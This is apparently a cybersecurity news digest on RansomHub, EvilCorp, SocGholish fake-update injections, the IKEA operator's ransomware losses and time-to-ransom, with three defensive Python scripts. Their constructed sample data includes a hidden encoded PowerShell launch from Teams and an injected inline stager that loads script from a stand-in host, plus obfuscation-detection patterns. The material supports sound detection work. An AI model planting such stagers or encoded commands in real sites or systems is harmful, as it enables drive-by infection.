CyberSecurity news

FlagThis - #ransomhub

@www.bleepingcomputer.com //
The Fourlis Group, which operates IKEA stores in Greece, Cyprus, Romania, and Bulgaria, has revealed a significant financial impact stemming from a ransomware attack that occurred in November 2024. The attack, which targeted the online IKEA shops just before the busy Black Friday weekend, resulted in substantial operational disruptions and financial losses. The company confirmed that these losses are estimated to be approximately €20 million ($22.8 million).

The initial signs of the attack became public on December 3, 2024, when the Fourlis Group acknowledged technical issues affecting the IKEA online stores, attributing them to a "malicious external action". Although the group also manages other retail brands such as Intersport, Foot Locker, and Holland & Barrett, the ransomware attack primarily impacted IKEA's online operations. A forensic investigation later found that data had been only temporarily unavailable and was quickly restored, and it turned up no evidence of data theft or of any leak of personal data.

Despite the significant financial impact and operational disruptions, no ransomware group has claimed responsibility for the attack to date. The lack of a public claim could indicate that the attackers were unsuccessful in stealing data or that they are pursuing a private settlement with the Fourlis Group. The incident underscores the growing threat of ransomware attacks targeting major retailers and the potential for substantial financial losses and operational challenges these attacks can cause.

Recommended read:
References :
  • BleepingComputer: Fourlis Group, the operator of IKEA stores in Greece, Cyprus, Romania, and Bulgaria, confirmed that the ransomware attack they suffered in November 2024 cost them approximately €20 million in losses.
  • BleepingComputer: The Fourlis Group, which operates IKEA stores in several Eastern European countries, has revealed the significant financial impact of the ransomware attack.
  • Techzine Global: This is a summary of the ransomware attack on the Fourlis Group and the significant financial losses incurred.

@cyble.com //
EvilCorp, a Russia-based cybercriminal enterprise already under sanctions, has been linked to the RansomHub ransomware operation, indicating a concerning level of cooperation between the two groups. Intelligence sources confirm that EvilCorp and RansomHub are actively sharing intrusion methods, indicators of compromise (IOCs), and tactics, techniques, and procedures (TTPs). This collaboration poses a significant threat as it combines the capabilities of a sanctioned entity known for large-scale financial cyberattacks with a prominent ransomware-as-a-service (RaaS) operation. RansomHub, active since February 2024 and reportedly run by Russian-speaking cybercriminals, has become increasingly popular among former affiliates of other RaaS platforms such as ALPHV/BlackCat and LockBit.

One of EvilCorp's signature TTPs is the use of the SocGholish JavaScript malware, also known as FAKEUPDATES, for initial access. It is delivered by drive-by download from compromised websites, disguised as a browser update prompt. Once a system is infected with SocGholish, EvilCorp affiliates can then deploy the RansomHub ransomware. Because EvilCorp has been under US sanctions since 2019, victims of this chain face a hard choice: paying a ransom that reaches a sanctioned entity violates those sanctions and exposes the payer to civil penalties from the US Treasury's Office of Foreign Assets Control (OFAC), which are imposed on a strict-liability basis. The picture is muddied further because EvilCorp is known to rebrand its ransomware and to operate as an affiliate of other RaaS programs, so a victim cannot tell from the ransom note alone whether a payment would end up with a sanctioned actor.

The partnership between EvilCorp and RansomHub shows how tangled the cybercrime landscape has become. Maksim Yakubets, reportedly at the helm of EvilCorp, has a long history in high-profile hacking campaigns and has been connected to both the LockBit ransomware and the Dridex banking trojan. The use of Microsoft Teams and other collaboration tools to spread malware through vishing scams further shows the range of tactics these actors employ. Security researchers advise organizations to monitor for PowerShell commands pasted into Teams messages, and to investigate any unusual use of Quick Assist or signed binaries running from unexpected locations.
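The three hunting signals named above (PowerShell run from the Teams client, Quick Assist launches, signed binaries executing outside the usual program directories) map directly onto process-creation telemetry. The script below is an added example written for this page, not code from Cyble or any vendor cited here. It assumes Sysmon Event ID 1 style field names (Image, ParentImage, Signed) in JSON lines, a hypothetical allowlist of directories where signed binaries are expected, and the sample events are constructed.

```python
"""Triage Windows process-creation telemetry for PowerShell-from-Teams, Quick Assist
launches and signed binaries running from unexpected paths. Added example; field names
follow the Sysmon Event ID 1 convention and the sample telemetry is constructed."""
import json
from pathlib import PureWindowsPath

# Where a validly signed binary is expected to execute from (assumption: extend with
# the estate's managed-software roots before using in production).
EXPECTED_SIGNED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
TEAMS_IMAGES = {"ms-teams.exe", "teams.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
QUICK_ASSIST_IMAGES = {"quickassist.exe"}


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _under_expected_dir(path: str) -> bool:
    p = path.lower().replace("/", "\\")
    return any(p.startswith(d) for d in EXPECTED_SIGNED_DIRS)


def triage_event(ev: dict) -> list[str]:
    """Return the names of the rules an event trips; empty list when nothing fires."""
    hits = []
    image = _basename(ev["Image"])
    parent = _basename(ev.get("ParentImage", ""))
    # Rule 1: PowerShell whose parent is the Teams client, i.e. a command run from chat.
    if image in POWERSHELL_IMAGES and parent in TEAMS_IMAGES:
        hits.append("powershell_from_teams")
    # Rule 2: any Quick Assist launch; rare outside the help desk, so worth a ticket.
    if image in QUICK_ASSIST_IMAGES:
        hits.append("quick_assist_launch")
    # Rule 3: a signed binary running from a user-writable location (Downloads, Temp, ...).
    if str(ev.get("Signed", "")).lower() == "true" and not _under_expected_dir(ev["Image"]):
        hits.append("signed_binary_unexpected_path")
    return hits


def triage(jsonl: str) -> list[tuple[str, list[str]]]:
    """Run triage_event over JSON-lines telemetry; return (image, rules) for each hit."""
    findings = []
    for line in jsonl.splitlines():
        if line.strip():
            ev = json.loads(line)
            hits = triage_event(ev)
            if hits:
                findings.append((ev["Image"], hits))
    return findings


# Constructed sample telemetry (not real logs); JSON needs doubled backslashes here.
SAMPLE = r"""
{"Image": "C:\\Program Files\\WindowsApps\\MSTeams_24.x\\ms-teams.exe", "ParentImage": "C:\\Windows\\explorer.exe", "Signed": "true"}
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\WindowsApps\\MSTeams_24.x\\ms-teams.exe", "Signed": "true", "CommandLine": "powershell -nop -w hidden -enc <base64>"}
{"Image": "C:\\Program Files\\WindowsApps\\MicrosoftCorporationII.QuickAssist_2.x\\QuickAssist.exe", "ParentImage": "C:\\Windows\\explorer.exe", "Signed": "true"}
{"Image": "C:\\Users\\alice\\Downloads\\support-tool.exe", "ParentImage": "C:\\Windows\\explorer.exe", "Signed": "true"}
{"Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "Signed": "true"}
{"Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\svc.exe", "ParentImage": "C:\\Windows\\explorer.exe", "Signed": "false"}
"""

if __name__ == "__main__":
    for image, rules in triage(SAMPLE):
        print(f"{', '.join(rules):32} {image}")
```

Rule 3 deliberately fires only on signed binaries: the point of the advice is that a valid signature is not a clean bill of health when the file sits in Downloads or Temp, which is where remote-support and RMM installers dropped during a vishing call end up. The unsigned binary in Temp is left to the EDR's existing rules.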

Recommended read:
References :
  • blog.bushidotoken.net: Tracking Adversaries: EvilCorp, the RansomHub affiliate
  • ThreatMon: Ransomhub Group & New Betruger Backdoor | Technical Malware Analysis Report
  • www.cybersecurity-insiders.com: EvilCorp join with RansomHub to launch global cyber attacks
  • thecyberexpress.com: DragonForce Claims to Be Taking Over RansomHub Ransomware Infrastructure
  • Virus Bulletin: ESET's Jakub Souček & Jan Holman discovered clear links between the RansomHub, Play, Medusa & BianLian ransomware gangs by following the trail of tooling that RansomHub offers its affiliates. Their report also looks into EDRKillShifter.

Adam O'Connor@feeds.feedburner.com //
SocGholish, also known as FakeUpdates, is facilitating the distribution of RansomHub ransomware through compromised websites. The malware-as-a-service (MaaS) framework, observed since 2018 and tracked by Trend Micro as Water Scylla, injects malicious scripts into legitimate websites. This action redirects users to deceptive pages disguised as browser update notifications, tricking them into downloading and executing malicious files that initiate the infection process.

Trend Micro researchers have analyzed SocGholish's MaaS framework, highlighting its use of highly obfuscated JavaScript loaders to evade detection and execute various malicious tasks. The SocGholish loader can download and execute malicious payloads, exfiltrate sensitive data, and execute arbitrary commands, providing persistent access for further exploitation and payload deployment. This intrusion set collaborates with threat actors operating rogue Keitaro Traffic Distribution System (TDS) instances to filter traffic, enhancing the effectiveness of RansomHub delivery. Detections have been highest in the United States, with government organizations among the most affected.
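Because the infection chain starts with script injected into an otherwise legitimate site, a site owner's first line of defence is an inventory check: which script hosts does the page actually load, and do any inline scripts decode themselves at runtime? The checker below is an added example written for this page, not Trend Micro's tooling or a SocGholish signature. The allowlisted hosts, the .test domains and the page content are all constructed; the obfuscation markers are generic heuristics, not indicators taken from the report.

```python
"""Flag script elements that are not in a page's known-good inventory, and inline
scripts that show runtime-decoding markers. Added example with constructed input."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts that legitimately serve script to the monitored site (assumption for the demo).
ALLOWED_SCRIPT_HOSTS = {"www.example-shop.test", "cdn.example-shop.test"}

# Cheap markers of JavaScript that assembles or decodes itself at runtime.
# Any two together in one inline block is treated as suspicious.
OBFUSCATION_MARKERS = [
    r"\beval\s*\(",
    r"\batob\s*\(",
    r"String\.fromCharCode",
    r"\bunescape\s*\(",
    r"document\.write\s*\(",
    r"\\x[0-9a-fA-F]{2}",
]


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external: list[str] = []
        self.inline: list[str] = []
        self._in_script = False
        self._buf: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def audit_page(html: str, page_host: str) -> list[dict]:
    """Return findings: unknown external script hosts, then obfuscated inline blocks."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    findings = []
    for src in p.external:
        # A relative or protocol-relative src resolves against the page's own host.
        host = urlparse(src).netloc.lower() or page_host.lower()
        if host not in ALLOWED_SCRIPT_HOSTS:
            findings.append({"kind": "unknown_script_host", "detail": src})
    for body in p.inline:
        hits = [m for m in OBFUSCATION_MARKERS if re.search(m, body)]
        if len(hits) >= 2:
            findings.append({"kind": "obfuscated_inline_script", "detail": hits})
    return findings


# Constructed page: three legitimate script elements followed by two that stand in
# for an injection on a compromised site. Domains are .test and do not exist.
SAMPLE_HTML = """<!doctype html>
<html><head>
<script src="/js/app.js"></script>
<script src="https://cdn.example-shop.test/vendor.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<!-- injected: a foreign loader plus an inline stager that builds its URL at runtime -->
<script src="//static.updates-cdn.test/loader.js"></script>
<script>(function(){var s=document.createElement('script');s.src=atob('aHR0cHM6Ly8=')+String.fromCharCode(115,116,97,116,105,99)+'.updates-cdn.test/a.js';document.head.appendChild(s);})();</script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for f in audit_page(SAMPLE_HTML, "www.example-shop.test"):
        print(f["kind"], f["detail"])
```

Run this against a baseline captured from a clean deployment rather than against whatever the live site currently serves, otherwise the injection becomes part of the baseline. Also fetch the page the way a victim would: the Keitaro TDS filtering described above means a scanner with a datacentre IP or a non-browser User-Agent may be served the clean page while real visitors get the redirect.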

Recommended read:
References :
  • www.trendmicro.com: SocGholish’s Intrusion Techniques Facilitate Distribution of RansomHub Ransomware
  • gbhackers.com: SocGholish Exploits Compromised Websites to Deliver RansomHub Ransomware
  • Virus Bulletin: Trend Micro researchers analyse SocGholish’s MaaS framework and its role in deploying RansomHub ransomware through compromised websites using highly obfuscated JavaScript loaders to evade detection and execute various malicious tasks.
  • securityonline.info: A new analysis by Trend Research has shed light on intrusion techniques involving the malware-as-a-service (MaaS) framework known
  • www.cybersecuritydive.com: The ransomware gang is collaborating with SocGholish, an extensive malware operation that employs compromised websites and fake browser updates.
  • Broadcom Software Blogs: Betruger backdoor being used by at least one affiliate of RansomHub.

@www.csoonline.com //
Ransomware gangs are accelerating their operations, sharply cutting the time between initial compromise and deployment of encryption. Recent analysis puts the average time-to-ransom (TTR) at 17 hours. That is a marked shift from the earlier pattern in which attackers lingered in networks for weeks to maximize reconnaissance and control. Some groups, among them Akira, Play, and Dharma/Crysis, have recorded TTRs as low as 4 to 6 hours.

This rapid pace presents considerable challenges for organizations attempting to defend against these attacks. The shrinking window for detection and response necessitates proactive threat detection and rapid incident response capabilities. The trend also highlights the increasing sophistication of ransomware groups, which are employing advanced tools and techniques to quickly achieve their objectives, often exploiting vulnerabilities in remote monitoring and management tools or using initial access brokers to infiltrate networks, escalate privileges, and deploy ransomware payloads.
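The practical question behind the 17-hour figure is whether an organization's own detect-and-contain time beats the TTR of the groups it is likely to meet. The script below is an added example written for this page, not from CSO Online or the report it summarizes: it derives TTR per incident from a constructed incident-response timeline, omits incidents that never reached encryption rather than counting them as zero, and lists the incidents in which a given detect-and-contain budget would have been outrun. Incident IDs, timestamps and the 12-hour budget are all constructed.

```python
"""Derive time-to-ransom (TTR) per incident from IR timeline records and compare it
with the organization's detect-and-contain time. Added example with constructed data."""
from datetime import datetime
from statistics import mean, median

# Constructed timeline, one CSV row per event. INC-3 was contained before encryption.
TIMELINE = """\
incident,timestamp,event
INC-1,2025-01-10T02:15:00,initial_access
INC-1,2025-01-10T06:40:00,encryption
INC-2,2025-01-12T22:05:00,initial_access
INC-2,2025-01-13T03:30:00,lateral_movement
INC-2,2025-01-13T15:05:00,encryption
INC-3,2025-01-20T09:00:00,initial_access
INC-3,2025-01-20T11:30:00,lateral_movement
"""


def parse_timeline(text: str) -> dict[str, dict[str, datetime]]:
    """incident -> event -> earliest timestamp seen for that event."""
    first: dict[str, dict[str, datetime]] = {}
    for line in text.strip().splitlines()[1:]:  # skip the header row
        inc, ts, event = line.split(",")
        when = datetime.fromisoformat(ts)
        evs = first.setdefault(inc, {})
        if event not in evs or when < evs[event]:
            evs[event] = when
    return first


def time_to_ransom_hours(text: str) -> dict[str, float]:
    """TTR = first encryption event minus first initial-access event, in hours.
    Incidents without an encryption event (contained, or still open) are omitted
    rather than scored as zero, which would drag the average down."""
    ttr = {}
    for inc, evs in parse_timeline(text).items():
        if "initial_access" in evs and "encryption" in evs:
            ttr[inc] = (evs["encryption"] - evs["initial_access"]).total_seconds() / 3600
    return ttr


def summarize(ttr: dict[str, float]) -> dict[str, float]:
    vals = list(ttr.values())
    return {"mean": mean(vals), "median": median(vals), "min": min(vals)}


def outrun_by_attacker(ttr: dict[str, float], detect_and_contain_hours: float) -> list[str]:
    """Incidents in which the org's detect-and-contain time would not have beaten encryption."""
    return sorted(inc for inc, h in ttr.items() if h <= detect_and_contain_hours)


if __name__ == "__main__":
    ttr = time_to_ransom_hours(TIMELINE)
    print(ttr)
    print(summarize(ttr))
    print("outrun at a 12h budget:", outrun_by_attacker(ttr, 12.0))
```

Plan against the minimum and the low percentiles, not the mean: a team that reliably contains within 12 hours looks comfortable next to a 17-hour average but still loses every incident that runs at the 4 to 6 hour pace the faster groups have shown.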

Recommended read:
References :
  • ciso2ciso.com: Source: www.csoonline.com, 17 Feb 2025, 5 min read, Incident Response / Ransomware. The window for intrusion detection keeps getting shorter as ransomware groups' time-to-ransom (TTR) accelerates.
  • gbhackers.com: Ransomware Gangs Encrypt Systems 17 Hours After Initial Infection
  • www.csoonline.com: Ransomware gangs extort victims 17 hours after intrusion on average
  • ciso2ciso.com: Ransomware gangs extort victims 17 hours after intrusion on average
  • Blog RSS Feed: Ransomware has become more than a threat—it's a calculated assault on industries, wielding AI-driven precision to bypass traditional defenses.